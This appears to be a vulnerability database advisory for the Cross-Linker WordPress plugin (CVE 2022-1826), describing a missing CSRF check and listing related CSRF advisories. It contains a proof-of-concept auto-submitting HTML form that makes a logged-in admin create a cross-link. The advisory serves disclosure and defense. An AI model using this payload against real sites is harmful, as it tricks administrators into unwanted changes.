Cross-Linker <= 3.0.1.9 – Arbitrary Cross-Link Creation via CSRF | CVE 2022-1826 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when creating Cross-Links, which could allow attackers to make a logged in admin perform such action via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-content/plugins/cross-linker/assets/process/add_link.php" method="POST">
    <input type="text" name="linker_word" value="tttttt">
    <input type="text" name="linker_uri" value="https://google.com">
    <input type="text" name="linker_attr" value="">
    <input type="text" name="linker_lang" value="-1">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

b9dba241-d94c-4ce5-8730-445ba8005e66

Timeline

Publicly Published

2022-05-30 (about 3 years ago)

Added

2022-05-30 (about 3 years ago)

Last Updated

2023-02-25 (about 2 years ago)

Other

Published

Title

Published

2023-09-27

Title

Woocommerce ESTO < 2.23.2 - Settings Update via CSRF

Published

2021-05-05

Title

Parcel Tracker eCourier < 1.0.2 - Plugin's Settings Update via CSRF

Published

2024-11-15

Title

404 Error Monitor <= 1.1 - Cross-Site Request Forgery to Plugin Settings Update via updatePluginSettings Function

Published

2025-04-16

Title

Internal Link Optimiser < 5.1.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-09-13

Title

10Web Map Builder for Google Maps < 1.0.74 - Cross-Site Request Forgery to Notice Dismissal